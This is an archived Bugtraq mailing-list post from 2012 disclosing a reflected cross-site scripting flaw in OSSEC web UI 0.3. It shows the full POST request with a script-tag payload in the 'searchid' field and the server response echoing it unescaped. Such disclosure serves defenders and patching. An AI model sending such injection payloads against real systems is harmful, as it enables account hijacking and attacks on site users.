| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 27 Sep 2012 09:05:17 +0200
From: "A. Ramos" <aramosf@...il.com>
To: bugtraq@...urityfocus.com
Subject: XSS in OSSEC wui 0.3
Hello All,
Just to report xss in ossec-wui 0.3
Request:
----
POST /ossec-wui/index.php?f=s HTTP/1.1
Host: 172.16.0.12
Content-Length: 267
monitoring=0&initdate=2012-09-24+13%3A41&finaldate=2012-09-24+17%3A41&level=7&grouppattern=ALL&strpattern=test&logpattern=ALL&srcippattern=&userpattern=test2&locationpattern=&rulepattern=&max_alerts_per_page=1000&search=<
Prev&searchid="><script>alert("514")</script>
-----
Response:
-----
value="1000" class="formText" /></td></tr>
<tr><td>
<input type="submit" name="search" value="Search" class="button" />
</td></tr></table>
<input type="hidden" name="searchid"
value=""><script>alert("514")</script>" />
</form><br /> <br />
----
--
Alejandro Ramos
http://twitter.com/aramosf
Powered by blists - more mailing lists